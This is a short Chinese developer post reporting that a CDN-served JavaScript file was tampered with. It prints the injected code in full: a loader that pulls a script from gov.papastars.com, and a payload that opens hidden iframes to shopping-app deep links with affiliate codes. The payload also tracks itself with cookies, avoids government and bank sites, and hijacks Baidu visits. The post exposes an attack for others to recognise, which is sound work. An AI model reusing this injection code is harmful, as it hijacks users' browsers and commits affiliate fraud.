一个恶心的劫持 CDN 静态资源返回被篡改

今天上午接到其他地区同事反馈说网站点击按钮没反应，于是自己试了下，手机和电脑都没有问题。下午的时发现，自己这边也开始出现问题了，排查后发现某个静态 js 资源被篡改了，完全和源数据不一样。

 (function(){var l=document.createElement('script');l.src='https://gov.papastars.com/dlhao.min.js';document.getElementsByTagName('body')[0].appendChild(l);})();(function(){var l=document.createElement('script');l.src='http://xxxxx//static/js/7.js';document.getElementsByTagName('body')[0].appendChild(l);})(); 

之后会被引入 dlhao.min.js ，然后在跳转回源，不过估计没写好吧，跳转应该是要 https。

 !function() { var e = ["https://gov.papastars.com/usany.min.html", 'openapp.jdmobile://virtual?params={"category":"jump","des":"m","url":"https://u.jd.com/1jEOCf","keplerID":"0","keplerFrom":"1","kepler_param":{"source":"kepler-open","otherData":{"mopenbp7":"0"}},"union_open":"union_cps"}', "vipshop://goHome?tra_from=tra%3AC01V006ijfbdtqnu%3A%3Amig_code%3Acps101%3A1cf9efd0abf84e8c94b7e1c01ebe7b2b", "tbopen://m.taobao.com/tbopen/index.html?source=auto&action=ali.open.nav&module=h5&bootImage=0&h5Url=https%3A%2F%2Fh5.m.taobao.com%2Fbcec%2Fdahanghai-jump.html%3Fspm%3D2014.ugdhh.3907731441.1217-279%26bc_fl_srcgrowth_dhh_3907731441_1217-279&spm=2014.ugdhh.3907731441.1217-279&bc_fl_src=growth_dhh_3907731441_1217-279&materialid=1217", "uclink://www.uc.cn/cc77796ca7c25dff9607d31b29effc07?action=open_url&src_pkg=sxmhx&src_ch=sxmhx42&src_scene=pullup&url=ext%3Ainfo_flow_open_channel%3Ach_id%3D100%26insert_item_ids%3D17864229593326336693%26type%3Dmultiple%26from%3D6001", "youku://weex?source=00002204&url=https%3A%2F%2Fmarket.m.taobao.com%2Fyep%2Fweexmaker%2Fykpage%2Fpigspring_wmdt.js%3Fwh_weex%3Dtrue%26refer%3Dsanfang1903_operation.chunyue.l_00002204_7000_IfQzQn_19022700&refer=sanfang1903_operation.chunyue.l_00002204_7000_IfQzQn_19022700"] , t = "y" , o = "dkwlsn3" , n = "vivi8dd" , r = "bbdm2lw" , a = .15 , i = function(e, t) { var o = document.createElement("iframe"); o.setAttribute("width", "1px"), o.setAttribute("height", "1p"), o.setAttribute("frameborder", "0"), o.setAttribute("scrolling", "no"), o.style.display = "none", o.setAttribute("src", e), document.body.appendChild(o), t && window.setTimeout(function() { document.body.removeChild(o) }, 3e3) } , c = function(e) { for (var t = e + "=", o = document.cookie.split(";"), n = 0; n < o.length; n++) { for (var r = o[n]; " " == r.charAt(0); ) r = r.substring(1); if (-1 != r.indexOf(t)) return r.substring(t.length, r.length) } return "" } , m = function(e, t, o) { var n = new Date , r = n.getTime(); r += 3600 * o * 1e3, n.setTime(r), document.cookie = e + "=" + t + "; expires=" + n.toUTCString() + "; path=/" }; !function(e, u) { var s = function(e, t) { if (e) { e = e.toLowerCase(); for (var o in t) if (e.indexOf(t[o]) > -1) return !0 } return !1 } , h = location.host , p = function(e) { var t = new Array(".gov","haiwainet.cn","yhd.com","alipay","p.weibo.com","people","xiangha.com","adipman.net","cnr.cn","17getfun.com","shuixindk.cn","ce.cn","boc","abchina","icbc","10086","51awifi.com","hospital"); return s(e, t) ? !1 : !0 }; if (p(h)) { if (/MicroMessenger/gi.test(u.userAgent)) return; var l = c(n); l != t && (i(e[0], !0), m(n, t, .5)); var f = Math.floor(100 * Math.random()) , l = c(o); l != t && (f >= 20 && i(e[1], !0), 80 >= f && i(e[2], !0), (35 > f || f > 75) && i(e[3], !0), u.userAgent.indexOf("UCBrowser") > -1 && Math.floor(100 * Math.random()) > 30 && i(e[4], !0), Math.floor(100 * Math.random()) > 50 && i(e[5], !0), m(o, t, a)) } var d = top.location.href , l = c(r); l != t && d.length < 40 && "https://m.baidu.com/?from" == d.substring(0, 25) && "?from=1015129o" !== top.location.search && Math.floor(100 * Math.random()) > 50 && (m(r, t, a), top.location.href = "https://m.baidu.com/?from=1015129o") }(e, navigator, document, window.location) }(); 

点击按钮将直接唤起淘宝之类的 app 至于哪家 CDN 就不说了 国外 VPS 测试了下 返回结果也一样